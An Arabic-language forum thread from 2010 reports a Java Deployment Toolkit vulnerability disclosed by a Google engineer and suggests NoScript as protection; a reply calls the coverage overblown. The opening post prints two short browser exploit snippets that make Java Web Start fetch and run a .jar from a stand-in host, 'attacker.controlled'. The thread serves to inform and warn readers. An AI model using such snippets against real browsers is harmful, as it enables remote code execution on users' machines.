الرئيسيةالبوابةبحـثالتسجيلدخول

شاطر | 
 

 ثغرة خطيرة فى JAVA

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
الكبير وصل
المشرف العام
المشرف العام


الجنس : ذكر
الابراج : العذراء
عدد الرسائل : 651
تاريخ الميلاد : 04/09/1985
العمر : 31
رقم العضوية : 6
السٌّمعَة : 16
نقاط الترشيح : 913
تاريخ التسجيل : 30/08/2007

مُساهمةموضوع: ثغرة خطيرة فى JAVA   الخميس أبريل 15, 2010 1:56 am

السلام عليكم

اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.

تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.

استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.

كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:
كود:
var o = document.createElement("OBJECT");

o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:
كود:
var o = document.createElement("OBJECT");

o.type = "application/npruntime-******able-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.

شخصيّاً أجد الثغرة خطيرة جداً لأن Java تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.

مكتشف الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام Firefox مع اضافة N o S c r i p t وبهذه الحالة ستكون قادر على التحكم بشكل كامل بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من أغلب ثغرات المتصفح وليس هذه الثغرة فقط.

_________________
free counters
الرجوع الى أعلى الصفحة اذهب الى الأسفل
No Problems
مـشرف


الجنس : ذكر
الابراج : الاسد
عدد الرسائل : 566
تاريخ الميلاد : 01/08/1988
العمر : 28
العمل/الترفيه : Programmer
المزاج : زى الفل
رقم العضوية : 4
السٌّمعَة : 31
نقاط الترشيح : 918
تاريخ التسجيل : 21/08/2007

مُساهمةموضوع: رد: ثغرة خطيرة فى JAVA   الخميس أبريل 15, 2010 10:15 am

ياباشا شركة صن بذات نفسها حلت المشكلة دى علطول .. بس الصحافة هى اللى بتحب المبالغة ... ما عندك مايكروسوفت مافيش برنامج ليها الا وليه ثغرات واولهم نسخة الويندوز عشان البورتات اللى مفتوحة فيها بتاعة الاكسبرولر
دة غير التطفل اللى بتعملة على عملائها ... ولو مش مصدقنى اقرأ الاتفاقية بتاعة الاوفيس قبل ما تصطبة ..
مجهود تشكر عليه اخى

_________________

تم تغيير الاسم من - themasterking - إلى - No Problems -



الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://algawhara.webs.com/
الكبير وصل
المشرف العام
المشرف العام


الجنس : ذكر
الابراج : العذراء
عدد الرسائل : 651
تاريخ الميلاد : 04/09/1985
العمر : 31
رقم العضوية : 6
السٌّمعَة : 16
نقاط الترشيح : 913
تاريخ التسجيل : 30/08/2007

مُساهمةموضوع: رد: ثغرة خطيرة فى JAVA   السبت أبريل 17, 2010 1:43 am


_________________
free counters
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
ثغرة خطيرة فى JAVA
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
الاندلس احلى منتدى :: برامج :: الأخبار التقنية-
انتقل الى: